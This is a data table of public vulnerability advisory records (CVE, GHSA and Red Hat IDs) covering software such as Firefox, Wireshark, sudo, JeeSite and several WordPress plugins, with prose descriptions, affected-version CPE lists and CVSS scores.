"cpe:2.3:a:ait-pro:bulletproof_security:.45.9:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.46:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.46.1:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.46.2:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.46.3:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.46.4:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.46.5:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.46.6:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.46.7:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.46.8:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.46.9:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.47:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.47.1:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.47.2:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.47.3:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.47.4:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.47.5:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.47.6:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.47.7:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.47.8:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.47.9:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.48:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.48.1:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.48.2:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.48.3:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.48.4:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.48.5:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.48.6:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.48.7:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.48.8:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.48.9:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.49:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.49.1:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.49.2:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.49.3:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.49.4:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.49.5:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.49.6:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.49.7:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.49.8:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.49.9:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.50:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.50.1:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.50.2:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.50.3:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.50.4:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.50.5:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.50.6:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.50.7:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.50.8:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.50.9:*:*:*:*:wordpress:*:*",
"cpe:2.3:a:ait-pro:bulletproof_security:.51:*:*:*:*:wordpress:*:*"
] | null | null | null | 6.5 | null |
|
CVE-2012-3105
|
The glBufferData function in the WebGL implementation in Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 does not properly mitigate an unspecified flaw in an NVIDIA driver, which allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors, a related issue to CVE-2011-3101.
|
[
"cpe:2.3:a:mozilla:firefox:4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta10:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta11:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta12:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta4:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta5:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta6:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta7:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta8:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0:beta9:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:4.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:5.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:6.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:6.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:6.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:7.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:7.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:8.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:8.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:9.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:10.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:10.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:10.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:10.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:10.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:11.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:12.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:firefox:12.0:beta6:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:*:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0:alpha:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0:beta:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0.5:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0.6:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0.7:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0.8:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.0.9:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1:alpha:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1:beta:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.4:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.5:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.6:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.7:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.8:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.9:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.10:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.11:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.12:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.13:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.14:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.15:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.16:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.17:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.18:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.1.19:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.5.0.8:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.5.0.9:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:1.5.0.10:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0:alpha_1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0:alpha_2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0:alpha_3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0:beta_1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0:beta_2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0:rc1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0:rc2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.5:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.6:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.7:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.8:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.9:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.10:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.11:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.12:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.13:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.0.14:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.1:alpha1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.1:alpha2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.1:alpha3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.1:beta1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.1:beta2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.1:beta3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.1:rc1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.1:rc2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.2:beta1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.2:beta2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.2:beta3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.3:beta1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.3:beta2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.3:beta3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.4:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.4:beta1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.4:beta2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.4:beta3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.5:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.5:beta1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.5:beta2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.5:beta3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.5:beta4:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.6:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.6:beta1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.6:beta2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.6:beta3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.6:beta4:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.6.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.7:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.7:beta1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.7:beta2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.7:beta3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.7:beta4:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.7:beta5:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.7.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.7.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.8:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.8:beta1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.8:beta2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.8:beta3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.8:beta4:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.8:beta5:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.8:beta6:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.9:beta1:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.9:beta2:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:seamonkey:2.9:beta3:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:6.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:6.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:6.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:7.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:7.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:8.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:9.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:10.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:10.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:10.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:10.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:10.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:11.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird:12.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird_esr:10.0:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird_esr:10.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird_esr:10.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird_esr:10.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:mozilla:thunderbird_esr:10.0.4:*:*:*:*:*:*:*"
] | null | null | null | 9.3 | null |
|
CVE-2025-7785
|
thinkgem JeeSite SsoController.java sso redirect
|
A vulnerability classified as problematic was found in thinkgem JeeSite up to 5.12.0. This vulnerability affects the function sso of the file src/main/java/com/jeesite/modules/sys/web/SsoController.java. The manipulation of the argument redirect leads to open redirect. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 3d06b8d009d0267f0255acc87ea19d29d07cedc3. It is recommended to apply a patch to fix this issue.
|
[] | 5.3 | 4.3 | 4.3 | 5 |
https://github.com/thinkgem/jeesite5/commit/3d06b8d009d0267f0255acc87ea19d29d07cedc3
|
RHSA-2014:0342
|
Red Hat Security Advisory: wireshark security update
|
wireshark: IEEE 802.15.4 dissector crash (wnpa-sec-2013-61) wireshark: NBAP dissector crash (wnpa-sec-2013-62) wireshark: SIP dissector crash (wnpa-sec-2013-63) wireshark: ActiveMQ OpenWire dissector large loop (wnpa-sec-2013-64) wireshark: TCP dissector crash (wnpa-sec-2013-65) wireshark: SIP dissector could go into an infinite loop (wnpa-sec-2013-66) wireshark: NTLMSSP v2 dissector could crash (wnpa-sec-2013-68) wireshark: NFS dissector crash (wnpa-sec-2014-01) wireshark: RLC dissector crash (wnpa-sec-2014-03) wireshark: buffer overflow in MPEG file parser (wnpa-sec-2014-04)
|
[
"cpe:/o:redhat:enterprise_linux:6::client",
"cpe:/o:redhat:enterprise_linux:6::server",
"cpe:/o:redhat:enterprise_linux:6::workstation"
] | null | null | null | null | null |
GHSA-7cj2-ppjq-7f33
|
Buffer overflow in various ha commands of VERITAS Cluster Server for UNIX before 4.0MP2 allows local users to execute arbitrary code via a long VCSI18N_LANG environment variable to (1) haagent, (2) haalert, (3) haattr, (4) hacli, (5) hacli_runcmd, (6) haclus, (7) haconf, (8) hadebug, (9) hagrp, (10) hahb, (11) halog, (12) hareg, (13) hares, (14) hastatus, (15) hasys, (16) hatype, (17) hauser, and (18) tststew.
|
[] | null | null | null | null | null |
|
GHSA-3m23-jj5c-7p7p
|
Cross-site scripting (XSS) vulnerability in phpgwapi/js/jscalendar/test.php in EGroupware Enterprise Line (EPL) before 11.1.20110804-1 and EGroupware Community Edition before 1.8.001.20110805 allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
|
[] | null | null | null | null | null |
|
GHSA-f85g-7486-87vh
|
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Laundry on Linux, MacOS allows Account Takeover. This issue affects Laundry: 2.3.0.
|
[] | 5.1 | null | null | null | null |
|
CVE-2006-1291
|
publish.ical.php in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier does not require authentication for write access to the calendars directory, which allows remote attackers to upload and execute arbitrary PHP scripts via a WebDAV PUT request with a filename containing a .php extension and a trailing null character.
|
[
"cpe:2.3:a:php_icalendar:php_icalendar:*:*:*:*:*:*:*:*",
"cpe:2.3:a:php_icalendar:php_icalendar:2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:php_icalendar:php_icalendar:2.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:php_icalendar:php_icalendar:2.0a2:*:*:*:*:*:*:*",
"cpe:2.3:a:php_icalendar:php_icalendar:2.0b:*:*:*:*:*:*:*",
"cpe:2.3:a:php_icalendar:php_icalendar:2.0c:*:*:*:*:*:*:*",
"cpe:2.3:a:php_icalendar:php_icalendar:2.1:*:*:*:*:*:*:*"
] | null | null | null | 7.5 | null |
|
GHSA-w4vp-v37v-r5rg
|
The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the style parameter in all versions up to, and including, 1.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
|
[] | null | 6.4 | null | null | null |
|
CVE-2023-38845
|
An issue in Anglaise Company Anglaise.Company v.13.6.1 allows a remote attacker to obtain sensitive information via crafted GET request.
|
[
"cpe:2.3:a:linecorp:line:13.6.1:*:*:*:*:*:*:*"
] | null | 7.5 | null | null | null |
|
RHSA-2020:0388
|
Red Hat Security Advisory: sudo security update
|
sudo: Privilege escalation via 'Runas' specification with 'ALL' keyword
|
[
"cpe:/o:redhat:rhel_e4s:8.0::baseos"
] | null | null | 7 | null | null |
CVE-2018-1000524
|
miniSphere version 5.2.9 and earlier contains a Integer Overflow vulnerability in layer_resize() function in map_engine.c that can result in remote denial of service. This attack appear to be exploitable via the victim must load a specially-crafted map which calls SetLayerSize in its entry script. This vulnerability appears to have been fixed in 5.0.3, 5.1.5, 5.2.10 and later.
|
[
"cpe:2.3:a:spheredev:minisphere:*:*:*:*:*:*:*:*"
] | null | null | 5.5 | 4.3 | null |
|
GHSA-r56q-wqp9-hrw3
|
An exploitable heap-based buffer overflow vulnerability exists in the PlanMaker document parsing functionality of SoftMaker Office 2021’s PlanMaker application. A specially crafted document can cause the document parser to explicitly trust a length from a particular record type and use it to write a 16-bit null relative to a buffer allocated on the stack. Due to a lack of bounds-checking on this value, this can allow an attacker to write to memory outside of the buffer and controllably corrupt memory. This can allow an attacker to earn code execution under the context of the application. An attacker can entice the victim to open a document to trigger this vulnerability.
|
[] | null | 7.8 | null | null | null |
|
GHSA-42v8-53xx-p57h
|
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.51, 8.52, and 8.53 allows remote attackers to affect integrity via unknown vectors related to Portal, a different vulnerability than CVE-2013-2404.
|
[] | null | null | null | null | null |
|
GHSA-fhfv-mh3h-f699
|
Multiple integer overflows in libXpm before 3.5.12, when a program requests parsing XPM extensions on a 64-bit platform, allow remote attackers to cause a denial of service (out-of-bounds write) or execute arbitrary code via (1) the number of extensions or (2) their concatenated length in a crafted XPM file, which triggers a heap-based buffer overflow.
|
[] | null | null | 9.8 | null | null |
|
GHSA-4952-p58q-6crx
|
JupyterLab: XSS due to lack of sanitization of the action attribute of an html <form>
|
ImpactUntrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook.PatchesPatched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21.References[OWASP Page on Restricting Form Submissions](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html)For more informationIf you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list [email protected]: Guillaume Jeanne from Google
|
[] | 6.3 | 7.4 | null | null | null |
GHSA-9fgm-w9px-m6vp
|
PunBB uses a predictable cookie_seed value that can be derived from the time of registration of the superadmin account (installation time), which might allow local users to perform unauthorized actions.
|
[] | null | null | null | null | null |
|
RHBA-2020:3527
|
Red Hat Bug Fix Advisory: kernel-rt bug fix update
|
kernel: triggering AP to send IAPP location updates for stations before the required authentication process has completed can lead to DoS
|
[
"cpe:/a:redhat:rhel_extras_rt:7"
] | null | 6.5 | null | null | null |
CVE-2025-45787
|
TOTOLINK A3100R V5.9c.1527 is vulnerable to Buffer Overflow viathe comment parameter in setIpPortFilterRules.
|
[] | null | 6.5 | null | null | null |
|
GHSA-x6p7-p3gg-q926
|
The implementations of streams for bz2 and php://output improperly implemented their readImpl functions, returning -1 consistently. This behavior caused some stream functions, such as stream_get_line, to trigger an out-of-bounds read when operating on such malformed streams. The implementations were updated to return valid values consistently. This affects all supported versions of HHVM (3.30 and 3.27.4 and below).
|
[] | null | null | 9.8 | null | null |
|
CVE-2024-37064
|
Deseriliazation of untrusted data can occur in versions 3.7.0 or newer of Ydata's ydata-profiling open-source library, enabling a maliciously crafted dataset to run arbitrary code on an end user's system when loaded.
|
[
"cpe:2.3:a:ydataai:ydata-profiling:*:*:*:*:*:*:*:*"
] | null | 7.8 | null | null | null |
|
RHSA-2021:1026
|
Red Hat Security Advisory: nss-softokn security update
|
nss: Use-after-free in sftk_FreeSession due to improper refcounting nss: Check length of inputs for cryptographic primitives nss: CHACHA20-POLY1305 decryption with undersized tag leads to out-of-bounds read
|
[
"cpe:/o:redhat:rhel_eus:7.7::computenode",
"cpe:/o:redhat:rhel_eus:7.7::server"
] | null | 7.4 | 8.1 | null | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.